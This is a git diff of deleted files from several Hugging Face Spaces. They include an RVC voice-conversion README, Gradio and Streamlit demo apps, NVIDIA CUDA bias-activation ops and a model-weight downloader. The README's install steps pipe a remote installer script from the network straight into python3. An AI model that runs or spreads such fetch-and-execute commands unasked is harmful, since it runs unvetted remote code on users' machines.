- -The following commands need to be executed in the environment of Python version 3.8 or higher: -```bash -# Install PyTorch-related core dependencies, skip if installed -# Reference: https://pytorch.org/get-started/locally/ -pip install torch torchvision torchaudio - -#For Windows + Nvidia Ampere Architecture(RTX30xx), you need to specify the cuda version corresponding to pytorch according to the experience of https://github.com/liujing04/Retrieval-based-Voice-Conversion-WebUI/issues/21 -#pip install torch torchvision torchaudio --index-url https://download.pytorch.org/whl/cu117 - -# Install the Poetry dependency management tool, skip if installed -# Reference: https://python-poetry.org/docs/#installation -curl -sSL https://install.python-poetry.org | python3 - - -# Install the project dependencies -poetry install -``` -You can also use pip to install the dependencies: - -```bash -pip install -r requirements.txt -``` - -## Preparation of other Pre-models -RVC requires other pre-models to infer and train. - -You need to download them from our [Huggingface space](https://huggingface.co/lj1995/VoiceConversionWebUI/tree/main/). - -Here's a list of Pre-models and other files that RVC needs: -```bash -hubert_base.pt - -./pretrained - -./uvr5_weights - -If you want to test the v2 version model (the v2 version model has changed the input from the 256-dimensional feature of 9-layer Hubert+final_proj to the 768-dimensional feature of 12-layer Hubert, and has added 3 period discriminators), you will need to download the additional files - -./pretrained_v2 - -#If you are using Windows, you may also need this file, skip if FFmpeg is installed -ffmpeg.exe -``` -Then use this command to start Webui: -```bash -python infer-web.py -``` -If you are using Windows, you can download and extract `RVC-beta.7z` to use RVC directly and use `go-web.bat` to start Webui. - -There's also a tutorial on RVC in Chinese and you can check it out if needed. 
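-The pre-model list above can be sanity-checked before launching the WebUI. The following is a minimal sketch, not part of the repository: the `REQUIRED` list is copied from the names above, and the paths are assumed to be relative to the repository root.

```python
import os

# Entries the README lists as required pre-models (assumed to sit in
# the repository root; this checklist is illustrative only).
REQUIRED = ["hubert_base.pt", "pretrained", "uvr5_weights"]


def missing_pre_models(root="."):
    """Return the required entries that are not present under `root`."""
    return [name for name in REQUIRED if not os.path.exists(os.path.join(root, name))]


if __name__ == "__main__":
    missing = missing_pre_models()
    if missing:
        print("Missing pre-models:", ", ".join(missing))
    else:
        print("All pre-models found; start the WebUI with: python infer-web.py")
```

Running the script from the repository root prints any entry that still needs to be downloaded from the Huggingface space linked above.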
- -## Credits -+ [ContentVec](https://github.com/auspicious3000/contentvec/) -+ [VITS](https://github.com/jaywalnut310/vits) -+ [HIFIGAN](https://github.com/jik876/hifi-gan) -+ [Gradio](https://github.com/gradio-app/gradio) -+ [FFmpeg](https://github.com/FFmpeg/FFmpeg) -+ [Ultimate Vocal Remover](https://github.com/Anjok07/ultimatevocalremovergui) -+ [audio-slicer](https://github.com/openvpi/audio-slicer) -## Thanks to all contributors for their efforts - - - - - diff --git a/spaces/lris/anime-remove-background/app.py b/spaces/lris/anime-remove-background/app.py deleted file mode 100644 index 230a0d5f8a3da6ab18ecb8db1cd90016a489b96a..0000000000000000000000000000000000000000 --- a/spaces/lris/anime-remove-background/app.py +++ /dev/null @@ -1,52 +0,0 @@ -import gradio as gr -import huggingface_hub -import onnxruntime as rt -import numpy as np -import cv2 - - -def get_mask(img, s=1024): - img = (img / 255).astype(np.float32) - h, w = h0, w0 = img.shape[:-1] - h, w = (s, int(s * w / h)) if h > w else (int(s * h / w), s) - ph, pw = s - h, s - w - img_input = np.zeros([s, s, 3], dtype=np.float32) - img_input[ph // 2:ph // 2 + h, pw // 2:pw // 2 + w] = cv2.resize(img, (w, h)) - img_input = np.transpose(img_input, (2, 0, 1)) - img_input = img_input[np.newaxis, :] - mask = rmbg_model.run(None, {'img': img_input})[0][0] - mask = np.transpose(mask, (1, 2, 0)) - mask = mask[ph // 2:ph // 2 + h, pw // 2:pw // 2 + w] - mask = cv2.resize(mask, (w0, h0))[:, :, np.newaxis] - return mask - - -def rmbg_fn(img): - mask = get_mask(img) - img = (mask * img + 255 * (1 - mask)).astype(np.uint8) - mask = (mask * 255).astype(np.uint8) - img = np.concatenate([img, mask], axis=2, dtype=np.uint8) - mask = mask.repeat(3, axis=2) - return mask, img - - -if __name__ == "__main__": - providers = ['CUDAExecutionProvider', 'CPUExecutionProvider'] - model_path = huggingface_hub.hf_hub_download("skytnt/anime-seg", "isnetis.onnx") - rmbg_model = rt.InferenceSession(model_path, providers=providers) - 
app = gr.Blocks() - with app: - gr.Markdown("# Anime Remove Background\n\n" - "![visitor badge](https://visitor-badge.glitch.me/badge?page_id=skytnt.animeseg)\n\n" - "demo for [https://github.com/SkyTNT/anime-segmentation/](https://github.com/SkyTNT/anime-segmentation/)") - with gr.Row(): - with gr.Column(): - input_img = gr.Image(label="input image") - examples_data = [[f"examples/{x:02d}.jpg"] for x in range(1, 4)] - examples = gr.Dataset(components=[input_img], samples=examples_data) - run_btn = gr.Button(variant="primary") - output_mask = gr.Image(label="mask") - output_img = gr.Image(label="result", image_mode="RGBA") - examples.click(lambda x: x[0], [examples], [input_img]) - run_btn.click(rmbg_fn, [input_img], [output_mask, output_img]) - app.launch() diff --git a/spaces/ludusc/latent-space-theories/torch_utils/ops/bias_act.h b/spaces/ludusc/latent-space-theories/torch_utils/ops/bias_act.h deleted file mode 100644 index 60b81c6058d54638a6d74a13046fa388442d767d..0000000000000000000000000000000000000000 --- a/spaces/ludusc/latent-space-theories/torch_utils/ops/bias_act.h +++ /dev/null @@ -1,38 +0,0 @@ -// Copyright (c) 2021, NVIDIA CORPORATION & AFFILIATES. All rights reserved. -// -// NVIDIA CORPORATION and its licensors retain all intellectual property -// and proprietary rights in and to this software, related documentation -// and any modifications thereto. Any use, reproduction, disclosure or -// distribution of this software and related documentation without an express -// license agreement from NVIDIA CORPORATION is strictly prohibited. - -//------------------------------------------------------------------------ -// CUDA kernel parameters. 
- -struct bias_act_kernel_params -{ - const void* x; // [sizeX] - const void* b; // [sizeB] or NULL - const void* xref; // [sizeX] or NULL - const void* yref; // [sizeX] or NULL - const void* dy; // [sizeX] or NULL - void* y; // [sizeX] - - int grad; - int act; - float alpha; - float gain; - float clamp; - - int sizeX; - int sizeB; - int stepB; - int loopX; -}; - -//------------------------------------------------------------------------ -// CUDA kernel selection. - -template void* choose_bias_act_kernel(const bias_act_kernel_params& p); - -//------------------------------------------------------------------------ diff --git a/spaces/ludusc/latent-space-theories/torch_utils/ops/bias_act.py b/spaces/ludusc/latent-space-theories/torch_utils/ops/bias_act.py deleted file mode 100644 index b2b53d7da34c76d53251bb9cbc2eb071c50af921..0000000000000000000000000000000000000000 --- a/spaces/ludusc/latent-space-theories/torch_utils/ops/bias_act.py +++ /dev/null @@ -1,209 +0,0 @@ -# Copyright (c) 2021, NVIDIA CORPORATION & AFFILIATES. All rights reserved. -# -# NVIDIA CORPORATION and its licensors retain all intellectual property -# and proprietary rights in and to this software, related documentation -# and any modifications thereto. Any use, reproduction, disclosure or -# distribution of this software and related documentation without an express -# license agreement from NVIDIA CORPORATION is strictly prohibited. - -"""Custom PyTorch ops for efficient bias and activation.""" - -import os -import numpy as np -import torch -import dnnlib - -from .. import custom_ops -from .. 
import misc - -#---------------------------------------------------------------------------- - -activation_funcs = { - 'linear': dnnlib.EasyDict(func=lambda x, **_: x, def_alpha=0, def_gain=1, cuda_idx=1, ref='', has_2nd_grad=False), - 'relu': dnnlib.EasyDict(func=lambda x, **_: torch.nn.functional.relu(x), def_alpha=0, def_gain=np.sqrt(2), cuda_idx=2, ref='y', has_2nd_grad=False), - 'lrelu': dnnlib.EasyDict(func=lambda x, alpha, **_: torch.nn.functional.leaky_relu(x, alpha), def_alpha=0.2, def_gain=np.sqrt(2), cuda_idx=3, ref='y', has_2nd_grad=False), - 'tanh': dnnlib.EasyDict(func=lambda x, **_: torch.tanh(x), def_alpha=0, def_gain=1, cuda_idx=4, ref='y', has_2nd_grad=True), - 'sigmoid': dnnlib.EasyDict(func=lambda x, **_: torch.sigmoid(x), def_alpha=0, def_gain=1, cuda_idx=5, ref='y', has_2nd_grad=True), - 'elu': dnnlib.EasyDict(func=lambda x, **_: torch.nn.functional.elu(x), def_alpha=0, def_gain=1, cuda_idx=6, ref='y', has_2nd_grad=True), - 'selu': dnnlib.EasyDict(func=lambda x, **_: torch.nn.functional.selu(x), def_alpha=0, def_gain=1, cuda_idx=7, ref='y', has_2nd_grad=True), - 'softplus': dnnlib.EasyDict(func=lambda x, **_: torch.nn.functional.softplus(x), def_alpha=0, def_gain=1, cuda_idx=8, ref='y', has_2nd_grad=True), - 'swish': dnnlib.EasyDict(func=lambda x, **_: torch.sigmoid(x) * x, def_alpha=0, def_gain=np.sqrt(2), cuda_idx=9, ref='x', has_2nd_grad=True), -} - -#---------------------------------------------------------------------------- - -_plugin = None -_null_tensor = torch.empty([0]) - -def _init(): - global _plugin - if _plugin is None: - _plugin = custom_ops.get_plugin( - module_name='bias_act_plugin', - sources=['bias_act.cpp', 'bias_act.cu'], - headers=['bias_act.h'], - source_dir=os.path.dirname(__file__), - extra_cuda_cflags=['--use_fast_math', '--allow-unsupported-compiler'], - ) - return True - -#---------------------------------------------------------------------------- - -def bias_act(x, b=None, dim=1, act='linear', alpha=None, 
gain=None, clamp=None, impl='cuda'): - r"""Fused bias and activation function. - - Adds bias `b` to activation tensor `x`, evaluates activation function `act`, - and scales the result by `gain`. Each of the steps is optional. In most cases, - the fused op is considerably more efficient than performing the same calculation - using standard PyTorch ops. It supports first and second order gradients, - but not third order gradients. - - Args: - x: Input activation tensor. Can be of any shape. - b: Bias vector, or `None` to disable. Must be a 1D tensor of the same type - as `x`. The shape must be known, and it must match the dimension of `x` - corresponding to `dim`. - dim: The dimension in `x` corresponding to the elements of `b`. - The value of `dim` is ignored if `b` is not specified. - act: Name of the activation function to evaluate, or `"linear"` to disable. - Can be e.g. `"relu"`, `"lrelu"`, `"tanh"`, `"sigmoid"`, `"swish"`, etc. - See `activation_funcs` for a full list. `None` is not allowed. - alpha: Shape parameter for the activation function, or `None` to use the default. - gain: Scaling factor for the output tensor, or `None` to use default. - See `activation_funcs` for the default scaling of each activation function. - If unsure, consider specifying 1. - clamp: Clamp the output values to `[-clamp, +clamp]`, or `None` to disable - the clamping (default). - impl: Name of the implementation to use. Can be `"ref"` or `"cuda"` (default). - - Returns: - Tensor of the same shape and datatype as `x`. 
- """ - assert isinstance(x, torch.Tensor) - assert impl in ['ref', 'cuda'] - if impl == 'cuda' and x.device.type == 'cuda' and _init(): - return _bias_act_cuda(dim=dim, act=act, alpha=alpha, gain=gain, clamp=clamp).apply(x, b) - return _bias_act_ref(x=x, b=b, dim=dim, act=act, alpha=alpha, gain=gain, clamp=clamp) - -#---------------------------------------------------------------------------- - -@misc.profiled_function -def _bias_act_ref(x, b=None, dim=1, act='linear', alpha=None, gain=None, clamp=None): - """Slow reference implementation of `bias_act()` using standard TensorFlow ops. - """ - assert isinstance(x, torch.Tensor) - assert clamp is None or clamp >= 0 - spec = activation_funcs[act] - alpha = float(alpha if alpha is not None else spec.def_alpha) - gain = float(gain if gain is not None else spec.def_gain) - clamp = float(clamp if clamp is not None else -1) - - # Add bias. - if b is not None: - assert isinstance(b, torch.Tensor) and b.ndim == 1 - assert 0 <= dim < x.ndim - assert b.shape[0] == x.shape[dim] - x = x + b.reshape([-1 if i == dim else 1 for i in range(x.ndim)]) - - # Evaluate activation function. - alpha = float(alpha) - x = spec.func(x, alpha=alpha) - - # Scale by gain. - gain = float(gain) - if gain != 1: - x = x * gain - - # Clamp. - if clamp >= 0: - x = x.clamp(-clamp, clamp) # pylint: disable=invalid-unary-operand-type - return x - -#---------------------------------------------------------------------------- - -_bias_act_cuda_cache = dict() - -def _bias_act_cuda(dim=1, act='linear', alpha=None, gain=None, clamp=None): - """Fast CUDA implementation of `bias_act()` using custom ops. - """ - # Parse arguments. - assert clamp is None or clamp >= 0 - spec = activation_funcs[act] - alpha = float(alpha if alpha is not None else spec.def_alpha) - gain = float(gain if gain is not None else spec.def_gain) - clamp = float(clamp if clamp is not None else -1) - - # Lookup from cache. 
- key = (dim, act, alpha, gain, clamp) - if key in _bias_act_cuda_cache: - return _bias_act_cuda_cache[key] - - # Forward op. - class BiasActCuda(torch.autograd.Function): - @staticmethod - def forward(ctx, x, b): # pylint: disable=arguments-differ - ctx.memory_format = torch.channels_last if x.ndim > 2 and x.stride(1) == 1 else torch.contiguous_format - x = x.contiguous(memory_format=ctx.memory_format) - b = b.contiguous() if b is not None else _null_tensor - y = x - if act != 'linear' or gain != 1 or clamp >= 0 or b is not _null_tensor: - y = _plugin.bias_act(x, b, _null_tensor, _null_tensor, _null_tensor, 0, dim, spec.cuda_idx, alpha, gain, clamp) - ctx.save_for_backward( - x if 'x' in spec.ref or spec.has_2nd_grad else _null_tensor, - b if 'x' in spec.ref or spec.has_2nd_grad else _null_tensor, - y if 'y' in spec.ref else _null_tensor) - return y - - @staticmethod - def backward(ctx, dy): # pylint: disable=arguments-differ - dy = dy.contiguous(memory_format=ctx.memory_format) - x, b, y = ctx.saved_tensors - dx = None - db = None - - if ctx.needs_input_grad[0] or ctx.needs_input_grad[1]: - dx = dy - if act != 'linear' or gain != 1 or clamp >= 0: - dx = BiasActCudaGrad.apply(dy, x, b, y) - - if ctx.needs_input_grad[1]: - db = dx.sum([i for i in range(dx.ndim) if i != dim]) - - return dx, db - - # Backward op. 
- class BiasActCudaGrad(torch.autograd.Function): - @staticmethod - def forward(ctx, dy, x, b, y): # pylint: disable=arguments-differ - ctx.memory_format = torch.channels_last if dy.ndim > 2 and dy.stride(1) == 1 else torch.contiguous_format - dx = _plugin.bias_act(dy, b, x, y, _null_tensor, 1, dim, spec.cuda_idx, alpha, gain, clamp) - ctx.save_for_backward( - dy if spec.has_2nd_grad else _null_tensor, - x, b, y) - return dx - - @staticmethod - def backward(ctx, d_dx): # pylint: disable=arguments-differ - d_dx = d_dx.contiguous(memory_format=ctx.memory_format) - dy, x, b, y = ctx.saved_tensors - d_dy = None - d_x = None - d_b = None - d_y = None - - if ctx.needs_input_grad[0]: - d_dy = BiasActCudaGrad.apply(d_dx, x, b, y) - - if spec.has_2nd_grad and (ctx.needs_input_grad[1] or ctx.needs_input_grad[2]): - d_x = _plugin.bias_act(d_dx, b, x, y, dy, 2, dim, spec.cuda_idx, alpha, gain, clamp) - - if spec.has_2nd_grad and ctx.needs_input_grad[2]: - d_b = d_x.sum([i for i in range(d_x.ndim) if i != dim]) - - return d_dy, d_x, d_b, d_y - - # Add to cache. 
- _bias_act_cuda_cache[key] = BiasActCuda - return BiasActCuda - -#---------------------------------------------------------------------------- diff --git a/spaces/ludvigolsen/plot_confusion_matrix/data.py b/spaces/ludvigolsen/plot_confusion_matrix/data.py deleted file mode 100644 index 00a380c51c1bb3dd1c8d66069d0a2e907cc32a32..0000000000000000000000000000000000000000 --- a/spaces/ludvigolsen/plot_confusion_matrix/data.py +++ /dev/null @@ -1,131 +0,0 @@ -import json -import pathlib -import pandas as pd -import streamlit as st -from utils import call_subprocess - -from components import add_toggle_vertical - - -def read_data(data): - if data is not None: - df = pd.read_csv(data) - return df - else: - return None - - -@st.cache_data -def read_data_cached(data): - return read_data(data) - - -def generate_data(out_path, num_classes, num_observations, seed) -> None: - call_subprocess( - f"Rscript generate_data.R --out_path {out_path} --num_classes {num_classes} --num_observations {num_observations} --seed {seed}", - message="Data generation script", - return_output=True, - encoding="UTF-8", - ) - - -class DownloadHeader: - """ - Class for showing header and download button (for an image file) in the same row. 
- """ - - @staticmethod - def slider_and_image_download( - filepath, - slider_label, - toggle_label, - download_label="Download", - slider_min=0.0, - slider_max=2.0, - slider_value=1.0, - slider_step=0.1, - slider_help=None, - toggle_value=False, - toggle_cols=[2, 5], - download_help="Download plot", - key=None, - ) -> int: - col1, col2, col3, col4 = st.columns([2, 6, 3, 3]) - with col2: - # Image viewing size slider - image_col_size = st.slider( - slider_label, - min_value=slider_min, - max_value=slider_max, - value=slider_value, - step=slider_step, - help=slider_help, - key=key + "_slider" if key is not None else key, - ) - with col3: - toggle_state = add_toggle_vertical( - label=toggle_label, - key=key + "_toggle" if key is not None else key, - default=toggle_value, - cols=toggle_cols, - ) - with col4: - st.write("") - with open(filepath, "rb") as img: - st.download_button( - label=download_label, - data=img, - file_name=pathlib.Path(filepath).name, - mime="image/png", - key=key + "_download" if key is not None else key, - help=download_help, - ) - return image_col_size, toggle_state - - @staticmethod - def _convert_df_to_csv(data, **kwargs): - return data.to_csv(**kwargs).encode("utf-8") - - @staticmethod - def header_and_data_download( - header, - data, - file_name, - col_sizes=[9, 2], - key=None, - label="Download", - help="Download data", - ): - col1, col2 = st.columns(col_sizes) - with col1: - st.subheader(header) - with col2: - st.write("") - st.download_button( - label=label, - data=DownloadHeader._convert_df_to_csv(data, index=False), - file_name=file_name, - key=key, - help=help, - ) - - @staticmethod - def centered_json_download( - data: dict, - file_name, - download_col_size=5, - key=None, - label="Download", - help="Download json file", - ): - col1, col2, col1 = st.columns([5, download_col_size, 5]) - with col2: - data_json = json.dumps(data) - st.download_button( - label=label, - data=data_json, - file_name=file_name, - key=key, - 
mime="application/json", - help=help, - ) diff --git a/spaces/lunarring/latentblending/README.md b/spaces/lunarring/latentblending/README.md deleted file mode 100644 index f54582befbfc4f8ad114d17d6c398c480670b15b..0000000000000000000000000000000000000000 --- a/spaces/lunarring/latentblending/README.md +++ /dev/null @@ -1,12 +0,0 @@ ---- -title: Latent Blending -emoji: 🫠 -colorFrom: green -colorTo: indigo -sdk: gradio -sdk_version: 3.19.1 -app_file: gradio_ui.py -pinned: false ---- - -Check out the configuration reference at https://huggingface.co/docs/hub/spaces-config-reference \ No newline at end of file diff --git a/spaces/lwchen/CodeFormer/CodeFormer/scripts/download_pretrained_models_from_gdrive.py b/spaces/lwchen/CodeFormer/CodeFormer/scripts/download_pretrained_models_from_gdrive.py deleted file mode 100644 index 7df5be6fc260394ee9bbd0a7ae377e2ca657fe83..0000000000000000000000000000000000000000 --- a/spaces/lwchen/CodeFormer/CodeFormer/scripts/download_pretrained_models_from_gdrive.py +++ /dev/null @@ -1,60 +0,0 @@ -import argparse -import os -from os import path as osp - -# from basicsr.utils.download_util import download_file_from_google_drive -import gdown - - -def download_pretrained_models(method, file_ids): - save_path_root = f'./weights/{method}' - os.makedirs(save_path_root, exist_ok=True) - - for file_name, file_id in file_ids.items(): - file_url = 'https://drive.google.com/uc?id='+file_id - save_path = osp.abspath(osp.join(save_path_root, file_name)) - if osp.exists(save_path): - user_response = input(f'{file_name} already exist. Do you want to cover it? Y/N\n') - if user_response.lower() == 'y': - print(f'Covering {file_name} to {save_path}') - gdown.download(file_url, save_path, quiet=False) - # download_file_from_google_drive(file_id, save_path) - elif user_response.lower() == 'n': - print(f'Skipping {file_name}') - else: - raise ValueError('Wrong input. 
Only accepts Y/N.') - else: - print(f'Downloading {file_name} to {save_path}') - gdown.download(file_url, save_path, quiet=False) - # download_file_from_google_drive(file_id, save_path) - -if __name__ == '__main__': - parser = argparse.ArgumentParser() - - parser.add_argument( - 'method', - type=str, - help=("Options: 'CodeFormer' 'facelib'. Set to 'all' to download all the models.")) - args = parser.parse_args() - - # file name: file id - # 'dlib': { - # 'mmod_human_face_detector-4cb19393.dat': '1qD-OqY8M6j4PWUP_FtqfwUPFPRMu6ubX', - # 'shape_predictor_5_face_landmarks-c4b1e980.dat': '1vF3WBUApw4662v9Pw6wke3uk1qxnmLdg', - # 'shape_predictor_68_face_landmarks-fbdc2cb8.dat': '1tJyIVdCHaU6IDMDx86BZCxLGZfsWB8yq' - # } - file_ids = { - 'CodeFormer': { - 'codeformer.pth': '1v_E_vZvP-dQPF55Kc5SRCjaKTQXDz-JB' - }, - 'facelib': { - 'yolov5l-face.pth': '131578zMA6B2x8VQHyHfa6GEPtulMCNzV', - 'parsing_parsenet.pth': '16pkohyZZ8ViHGBk3QtVqxLZKzdo466bK' - } - } - - if args.method == 'all': - for method in file_ids.keys(): - download_pretrained_models(method, file_ids[method]) - else: - download_pretrained_models(args.method, file_ids[args.method]) \ No newline at end of file diff --git a/spaces/lychees/Stable-Diffusion-ControlNet-WebUI/diffusion_webui/diffusion_models/__init__.py b/spaces/lychees/Stable-Diffusion-ControlNet-WebUI/diffusion_webui/diffusion_models/__init__.py deleted file mode 100644 index e69de29bb2d1d6434b8b29ae775ad8c2e48c5391..0000000000000000000000000000000000000000 diff --git a/spaces/lykeven/CogVLM/style.css b/spaces/lykeven/CogVLM/style.css deleted file mode 100644 index 4693e18e14e99aa7194b4f81904c7ad23e661021..0000000000000000000000000000000000000000 --- a/spaces/lykeven/CogVLM/style.css +++ /dev/null @@ -1,7 +0,0 @@ -h1 { - text-align: center; - } - img#visitor-badge { - display: block; - margin: auto; - } \ No newline at end of file diff --git a/spaces/masakhane/dialogue-chat/app.py b/spaces/masakhane/dialogue-chat/app.py deleted file mode 100644 index 
543d06fe01a490597fe8fbbf68e608f2156cebc2..0000000000000000000000000000000000000000 --- a/spaces/masakhane/dialogue-chat/app.py +++ /dev/null @@ -1,267 +0,0 @@ -from typing import Iterator -import gradio as gr -import torch -from model import get_input_token_length, run - -DEFAULT_SYSTEM_PROMPT = """\ -Wetin be your name ?\ -""" -MAX_MAX_NEW_TOKENS = 2048 -DEFAULT_MAX_NEW_TOKENS = 1024 -MAX_INPUT_TOKEN_LENGTH = 4000 - -DESCRIPTION = """ -# Masakhane Dialogue Models - -This Space demonstrates the dialogue models for Nigerian Pidgin, an African language.\n - -🔎 For more about us, visit [our homepage](https://www.masakhane.io/). - -""" - - -if not torch.cuda.is_available(): - DESCRIPTION += '\n
    <p>Running on CPU 🥶 This demo will be very slow on CPU.</p>
    ' - - -def clear_and_save_textbox(message: str) -> tuple[str, str]: - return '', message - - -def display_input(message: str, - history: list[tuple[str, str]]) -> list[tuple[str, str]]: - history.append((message, '')) - return history - - -def delete_prev_fn( - history: list[tuple[str, str]]) -> tuple[list[tuple[str, str]], str]: - try: - message, _ = history.pop() - except IndexError: - message = '' - return history, message or '' - - -def generate( - message: str, - history_with_input: list[tuple[str, str]], - system_prompt: str, - max_new_tokens: int, - temperature: float, - top_p: float, - top_k: int, -) -> Iterator[list[tuple[str, str]]]: - if max_new_tokens > MAX_MAX_NEW_TOKENS: - raise ValueError - - history = history_with_input[:-1] - generator = run(message, history, system_prompt, max_new_tokens, temperature, top_p, top_k) - try: - first_response = next(generator) - yield history + [(message, first_response)] - except StopIteration: - yield history + [(message, '')] - for response in generator: - yield history + [(message, response)] - - -def process_example(message: str) -> tuple[str, list[tuple[str, str]]]: - generator = generate(message, [], DEFAULT_SYSTEM_PROMPT, 1024, 1, 0.95, 50) - for x in generator: - pass - return '', x - - -def check_input_token_length(message: str, chat_history: list[tuple[str, str]], system_prompt: str) -> None: - input_token_length = get_input_token_length(message, chat_history, system_prompt) - if input_token_length > MAX_INPUT_TOKEN_LENGTH: - raise gr.Error(f'The accumulated input is too long ({input_token_length} > {MAX_INPUT_TOKEN_LENGTH}). 
Clear your chat history and try again.') - - -with gr.Blocks(css='style.css') as demo: - gr.Markdown(DESCRIPTION) - #gr.DuplicateButton(value='Duplicate Space for private use', - # elem_id='duplicate-button') - - with gr.Group(): - chatbot = gr.Chatbot(label='Chatbot') - with gr.Row(): - textbox = gr.Textbox( - container=False, - show_label=False, - placeholder='Type a message...', - scale=10, - ) - submit_button = gr.Button('Submit', - variant='primary', - scale=1, - min_width=0) - with gr.Row(): - retry_button = gr.Button('🔄 Retry', variant='secondary') - undo_button = gr.Button('↩️ Undo', variant='secondary') - clear_button = gr.Button('🗑️ Clear', variant='secondary') - - saved_input = gr.State() - - with gr.Accordion(label='Advanced options', open=False): - system_prompt = gr.Textbox(label='System prompt', - value=DEFAULT_SYSTEM_PROMPT, - lines=6) - max_new_tokens = gr.Slider( - label='Max new tokens', - minimum=1, - maximum=MAX_MAX_NEW_TOKENS, - step=1, - value=DEFAULT_MAX_NEW_TOKENS, - ) - temperature = gr.Slider( - label='Temperature', - minimum=0.1, - maximum=4.0, - step=0.1, - value=1.0, - ) - top_p = gr.Slider( - label='Top-p (nucleus sampling)', - minimum=0.05, - maximum=1.0, - step=0.05, - value=0.95, - ) - top_k = gr.Slider( - label='Top-k', - minimum=1, - maximum=1000, - step=1, - value=50, - ) - - gr.Examples( - examples=[ - 'How I fit chop for here?', - 'I hear say restaurant dey here.', - 'Abeg you fit tell me which kind chop dey?', - 'I dey find restaurant.', - ], - inputs=textbox, - outputs=[textbox, chatbot], - fn=process_example, - cache_examples=False, - ) - - #gr.Markdown(LICENSE) - - textbox.submit( - fn=clear_and_save_textbox, - inputs=textbox, - outputs=[textbox, saved_input], - api_name=False, - queue=False, - ).then( - fn=display_input, - inputs=[saved_input, chatbot], - outputs=chatbot, - api_name=False, - queue=False, - ).then( - fn=check_input_token_length, - inputs=[saved_input, chatbot, system_prompt], - api_name=False, - 
queue=False, - ).success( - fn=generate, - inputs=[ - saved_input, - chatbot, - system_prompt, - max_new_tokens, - temperature, - top_p, - top_k, - ], - outputs=chatbot, - api_name=False, - ) - - button_event_preprocess = submit_button.click( - fn=clear_and_save_textbox, - inputs=textbox, - outputs=[textbox, saved_input], - api_name=False, - queue=False, - ).then( - fn=display_input, - inputs=[saved_input, chatbot], - outputs=chatbot, - api_name=False, - queue=False, - ).then( - fn=check_input_token_length, - inputs=[saved_input, chatbot, system_prompt], - api_name=False, - queue=False, - ).success( - fn=generate, - inputs=[ - saved_input, - chatbot, - system_prompt, - max_new_tokens, - temperature, - top_p, - top_k, - ], - outputs=chatbot, - api_name=False, - ) - - retry_button.click( - fn=delete_prev_fn, - inputs=chatbot, - outputs=[chatbot, saved_input], - api_name=False, - queue=False, - ).then( - fn=display_input, - inputs=[saved_input, chatbot], - outputs=chatbot, - api_name=False, - queue=False, - ).then( - fn=generate, - inputs=[ - saved_input, - chatbot, - system_prompt, - max_new_tokens, - temperature, - top_p, - top_k, - ], - outputs=chatbot, - api_name=False, - ) - - undo_button.click( - fn=delete_prev_fn, - inputs=chatbot, - outputs=[chatbot, saved_input], - api_name=False, - queue=False, - ).then( - fn=lambda x: x, - inputs=[saved_input], - outputs=textbox, - api_name=False, - queue=False, - ) - - clear_button.click( - fn=lambda: ([], ''), - outputs=[chatbot, saved_input], - queue=False, - api_name=False, - ) - -demo.queue(max_size=20).launch() diff --git a/spaces/matthoffner/chatbot-mini/utils/data/throttle.ts b/spaces/matthoffner/chatbot-mini/utils/data/throttle.ts deleted file mode 100644 index 1a1e3e5e3d74a4d22a3a6c1a3648ae5116ccd4f3..0000000000000000000000000000000000000000 --- a/spaces/matthoffner/chatbot-mini/utils/data/throttle.ts +++ /dev/null @@ -1,22 +0,0 @@ -export function throttle any>( - func: T, - limit: number, -): T { - let lastFunc: 
ReturnType<typeof setTimeout>; - let lastRan: number; - - return ((...args) => { - if (!lastRan) { - func(...args); - lastRan = Date.now(); - } else { - clearTimeout(lastFunc); - lastFunc = setTimeout(() => { - if (Date.now() - lastRan >= limit) { - func(...args); - lastRan = Date.now(); - } - }, limit - (Date.now() - lastRan)); - } - }) as T; -} diff --git a/spaces/matthoffner/falcon-40b-instruct-ggml/README.md b/spaces/matthoffner/falcon-40b-instruct-ggml/README.md deleted file mode 100644 index 5e4d681c7bef4a754722bd7bbfcfac4be2675bb7..0000000000000000000000000000000000000000 --- a/spaces/matthoffner/falcon-40b-instruct-ggml/README.md +++ /dev/null @@ -1,14 +0,0 @@ ---- -title: falcon-40b-ggml-cuda -emoji: 🦅 -colorFrom: red -colorTo: blue -sdk: docker -pinned: false -app_port: 7860 ---- - -# falcon-40b-ggml-cuda - -## ggllm.cpp -## ctransformers diff --git a/spaces/mattricesound/RemFx/scripts/test.py b/spaces/mattricesound/RemFx/scripts/test.py deleted file mode 100644 index e63e282ea397bbf4161567ae43775eb7696e2329..0000000000000000000000000000000000000000 --- a/spaces/mattricesound/RemFx/scripts/test.py +++ /dev/null @@ -1,51 +0,0 @@ -import pytorch_lightning as pl -import hydra -from omegaconf import DictConfig -import remfx.utils as utils -import torch - -log = utils.get_logger(__name__) - - -@hydra.main(version_base=None, config_path="../cfg", config_name="config.yaml") -def main(cfg: DictConfig): - # Apply seed for reproducibility - if cfg.seed: - pl.seed_everything(cfg.seed) - log.info(f"Instantiating datamodule <{cfg.datamodule._target_}>.") - datamodule = hydra.utils.instantiate(cfg.datamodule, _convert_="partial") - log.info(f"Instantiating model <{cfg.model._target_}>.") - model = hydra.utils.instantiate(cfg.model, _convert_="partial") - device = torch.device("cuda" if torch.cuda.is_available() else "cpu") - state_dict = torch.load(cfg.ckpt_path, map_location=device)[ - "state_dict" - ] - model.load_state_dict(state_dict) - - # Init all callbacks - callbacks = [] - if 
"callbacks" in cfg: - for _, cb_conf in cfg["callbacks"].items(): - if "_target_" in cb_conf: - log.info(f"Instantiating callback <{cb_conf._target_}>.") - callbacks.append(hydra.utils.instantiate(cb_conf, _convert_="partial")) - - logger = hydra.utils.instantiate(cfg.logger, _convert_="partial") - log.info(f"Instantiating trainer <{cfg.trainer._target_}>.") - trainer = hydra.utils.instantiate( - cfg.trainer, callbacks=callbacks, logger=logger, _convert_="partial" - ) - log.info("Logging hyperparameters!") - utils.log_hyperparameters( - config=cfg, - model=model, - datamodule=datamodule, - trainer=trainer, - callbacks=callbacks, - logger=logger, - ) - trainer.test(model=model, datamodule=datamodule) - - -if __name__ == "__main__": - main() diff --git a/spaces/medici/dreambooth-training/convertosd.py b/spaces/medici/dreambooth-training/convertosd.py deleted file mode 100644 index 1211d34edf018b7c402a765c5a7ecdb684cc28e3..0000000000000000000000000000000000000000 --- a/spaces/medici/dreambooth-training/convertosd.py +++ /dev/null @@ -1,302 +0,0 @@ -# Script for converting a HF Diffusers saved pipeline to a Stable Diffusion checkpoint. -# *Only* converts the UNet, VAE, and Text Encoder. -# Does not convert optimizer state or any other thing. 
